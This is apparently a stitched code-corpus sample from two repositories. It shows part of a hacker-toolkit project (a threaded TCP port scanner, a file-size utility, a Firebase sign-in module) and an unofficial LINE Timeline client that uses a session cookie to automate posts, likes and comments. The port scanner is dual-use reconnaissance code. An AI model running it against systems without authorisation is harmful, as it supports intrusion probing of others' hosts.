s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(0.1)
if s.connect_ex((i,port))==0:
myl.append(port)
Thread.set_kwargs(min=p+1, max=6539*2)
p+=1
Thread.kill()
def d(self):
for ip in self.ips:
self.display(ip)
def runs(self):
p1=u(target=self.scan,args=())
p1.start()
p1.join()
s1=u(target=self.d,args=())
s1.start()
if __name__ == '__main__':
Main().runs()
```
#### File: base/bin/size.py
```python
import os
size=os.path
import sys
from N4Tools.Design import ThreadAnimation,AnimationTools,Animation
class Size:
def __init__(self,namefile):
self.namefile=namefile
def sizenumFile(self):
return[os.path.getsize(self.namefile),self.namefile]
def sizenumDir(self):
if os.path.isfile(self.namefile):return self.sizenumFile()
elif os.path.isdir(self.namefile):
s=0
for d,i,r in os.walk(self.namefile):
for n in r:s+=os.path.getsize(os.path.join(d,n))
return[s,self.namefile]
def GetSize(self):
F=self.sizenumDir()
s=F[0]
G=s/1024
S='kB'
if G>1024:
G=G/1024
S='MB'
if G>1024:
G=G/1024
S='GB'
G=str(G).split('.')
return f'{F[1]} : \033[94m{G[0]}.{G[1][0:2]} {S}'
text_anim = AnimationTools.set_text_anim('Calculating the size...')
AN = Animation()
kwargs = (lambda **kwargs:kwargs)(text=text_anim)
@ThreadAnimation(Animation=AN.Loading,kwargs=kwargs)
def App(Thread):
out=[]
for p in sys.argv[1:]:
try:
out.append(f"\033[93m{Size(p).GetSize()}\033[0m")
except:out.append(f"[Errno 2] No such file or directory: '{os.path.join('/',*__file__.split('/')[:-1],p)}")
Thread.kill()
print('\n'.join(out))
App()
```
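A minimal usage sketch for the `Size` helper above, assuming the class is copied out on its own (importing the script as-is also runs `App()`); the path is a placeholder:
```python
s = Size('.')       # accepts either a file or a directory path
print(s.GetSize())  # e.g. ". : 1.23 MB", with ANSI colour codes around the number
```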
#### File: HackerMode/base/system.py
```python
import os
import sys
import json
import marshal
import pathlib
from typing import List
sys.path.append('/'.join(os.path.abspath(__file__).split('/')[:-1]))
class System:
TOOL_NAME: str = 'HackerMode'
BASE_PATH: str = pathlib.Path(os.path.abspath(__file__)).parent
def __init__(self):
self.HACKERMODE_PACKAGES = self.HACKERMODE_PACKAGES()
@property
def BIN_PATH(self) -> str:
return ''.join(sys.executable.split('bin')[:-1]) + 'bin'
@property
def TOOL_PATH(self) -> str:
'''To get the tool path'''
ToolPath = os.path.join(os.environ['HOME'],'.HackerMode')
if not os.path.isdir(ToolPath):
os.mkdir(ToolPath)
return ToolPath
@property
def PLATFORME(self) -> str:
'''To get the platform name'''
if sys.platform in ('win32', 'cygwin'):
return 'win'
elif sys.platform == 'darwin':
return 'macosx'
elif 'PWD' in os.environ and 'com.termux' in os.environ['PWD']:
return 'termux'
elif sys.platform.startswith('linux') or sys.platform.startswith('freebsd'):
return 'linux'
return 'unknown'
@property
def SYSTEM_PACKAGES(self) -> str:
        '''To get all files that are in the [/usr/bin] directory'''
return os.listdir(self.BIN_PATH)
def HACKERMODE_PACKAGES(self) -> List[str]:
HackerModePackages = lambda path: [
a for a in os.listdir(
os.path.abspath(os.path.join(self.BASE_PATH,path)))
]
packages: List[str] = []
for file_name in HackerModePackages('bin'):
for ext in ['.c','.py','.sh','.dart','.java','.php','.js','.pyc','.cpp']:
if file_name.endswith(ext):
packages.append(file_name[0:-len(ext)])
for tool_name in HackerModePackages('tools'):
if tool_name not in packages:
packages.append(tool_name)
return list(set(packages))
System = System()
class DataBase:
config = {
"apiKey": "<KEY>",
"authDomain": "hackermode-c542d.firebaseapp.com",
"databaseURL": "https://hackermode-c542d.firebaseapp.com",
"storageBucket": "hackermode-c542d.appspot.com"
}
def __init__(self):
import pyrebase, requests
self.requests = requests
self.firebase = pyrebase.initialize_app(self.config)
self.auth = self.firebase.auth()
def sign_in(self,email,password):
try:
user = self.auth.sign_in_with_email_and_password(email,password)
return {
'status_code':200,
'data':user,
}
except self.requests.exceptions.HTTPError as e:
return {
'status_code':400,
'data':json.loads(e.strerror)
}
def sign_up(self,email,password,repeat_password):
if password != repeat_password:
return {
'status_code': 400,
'data': {
'error':{
'message':'PASSWORD_ERROR'
}
}
}
try:
user = self.auth.create_user_with_email_and_password(email,password)
return {
'status_code':200,
'data':user,
}
except self.requests.exceptions.HTTPError as e:
return {
'status_code':400,
'data':json.loads(e.strerror)
}
def send_email_verification(self,token):
if (data:=self.auth.get_account_info(token)).get('users')[0].get('emailVerified'):
return {
'status_code':200,
'data':data
}
try:
self.auth.send_email_verification(token)
return {
'status_code':200,
'data':self.auth.get_account_info(token)
}
except self.requests.exceptions.HTTPError as e:
return {
'status_code': 400,
'data': json.loads(e.strerror)
}
``` |
{
"source": "jokeralish/Linetheme",
"score": 3
} |
#### File: Linetheme/LineTimeline/client.py
```python
import requests
import json
import lxml.html
class LineTimeline:
host = "https://timeline.line.me/api/"
headers = {
"Host": "timeline.line.me",
"Connection": "keep-alive",
"Accept": "application/json, text/plain, */*",
"X-Timeline-WebVersion": "1.10.2",
"X-Line-AcceptLanguage": "ja",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36",
"Origin": "https://timeline.line.me",
"Content-Type": "application/json;charset=UTF-8",
"Referer": "https://timeline.line.me/",
"Accept-Encoding": "gzip, deflate, br",
"Accept-Language": "ja,en-US;q=0.9,en;q=0.8",
"Cookie": ""
}
homeId = ""
name = ""
def __init__(self, token):
self.headers["Cookie"] = "lwtl={}".format(token)
try:
r = requests.get(url="https://timeline.line.me/", headers=self.headers)
r = lxml.html.fromstring(r.text)
home = r.xpath("//a")
name = r.xpath("//span")
for x in home:
try:
if '83' == x.attrib["data-reactid"]:
self.homeId = x.attrib["href"].replace("/user/","")
except:
pass
for x in name:
try:
if '79' == x.attrib["data-reactid"]:
self.name = x.text
except:
pass
if not self.name or not self.homeId:
print("Loggin Failed")
else:
print("Loggin Success")
print("Name : {}\nhomeId : {}".format(self.name, self.homeId))
except Exception as e:
print(e)
def getFeed(self, postLimit=10, commentLimit=2, likeLimit=20):
data = {"postLimit": postLimit, "commentLimit": commentLimit, "likeLimit": likeLimit}
r = requests.get(url=self.host + "feed/list.json", headers=self.headers, params=data)
return r.json()
def createPost(self, viewType, text):
if viewType == 0:
viewType = "NONE"
elif viewType == 1:
viewType = "FRIEND"
elif viewType == 2:
viewType = "ALL"
json = {"postInfo": {"readPermission": {"type": viewType,}},"contents": {"text": text,"stickers": [],"media": [],"contentsStyle": {"textStyle": {},"stickerStyle": {}}}}
r = requests.post(url=self.host + "post/create.json", headers=self.headers, json=json)
return r.json()
def deletePost(self, postId):
json = {"postId": postId}
r = requests.post(url=self.host + "post/delete.json", headers=self.headers, json=json)
return r.json()
def likePost(self, postId, likeType=1001):
json = {"contentId": postId, "likeType": "1001"}
r = requests.post(url=self.host + "like/create.json", headers=self.headers, json=json)
return r.json()
def unlikePost(self, postId):
json = {"contentId": postId}
r = requests.post(url=self.host + "like/cancel.json", headers=self.headers, json=json)
return r.json()
def createComment(self, postId, text=None):
if text == None:
text = ""
json = {"contentId": postId, "commentText": text}
r = requests.post(url=self.host + "comment/create.json", headers=self.headers, json=json)
return r.json()
def deleteComment(self, postId, commentId):
json = {"postId": postId, "commentId": commentId}
r = requests.post(url=self.host + "comment/delete.json", headers=self.headers, json=json)
return r.json()
``` |
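A hedged usage sketch (the token is a placeholder for the `lwtl` cookie value, and these unofficial endpoints may have changed since the client was written):
```python
client = LineTimeline("<lwtl cookie value>")  # prints login status during __init__
feed = client.getFeed(postLimit=5)            # parsed JSON of the timeline feed
resp = client.createPost(2, "hello")          # readPermission 2 -> 'ALL'
print(resp)
```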